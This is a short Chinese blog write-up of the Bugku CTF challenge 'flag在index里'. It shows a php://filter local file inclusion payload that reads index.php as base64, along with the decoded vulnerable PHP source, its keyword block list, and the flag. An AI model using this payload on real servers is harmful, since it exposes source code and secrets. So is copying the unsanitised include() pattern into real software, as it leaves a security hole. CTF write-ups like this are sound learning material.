Bugku-CTF之flag在index里

 

Day15

flag在index里

http://123.206.87.240:8005/post/
 
 
 
 
本题要点:php://filter
 
点击发现:
我们点击后发现网址变成了 http://123.206.87.240:8005/post/index.php?file=show.php
这里我们看到了file关键字
于是我们就想到了php://filter
具体详情请见
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
所以我们把网址改为
http://123.206.87.240:8005/post/index.php? file=php://filter/read=convert.base64-encode/resource=index.php
 
访问得到一串base64编码
 
base64编码为:
PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==
 
解码一下:
仔细看一下就发现了flag
 
    Bugku-ctf
    
    error_reporting(0);
    if(!$_GET[file]){echo 'click me? no';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file);
//flag:flag{edulcni_elif_lacol_si_siht}
?>
 
 
完成!
 
 
 
 
参考资料:
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
 
 
 

转载于:https://www.cnblogs.com/0yst3r-2046/p/10745943.html

你可能感兴趣的:(Bugku-CTF之flag在index里)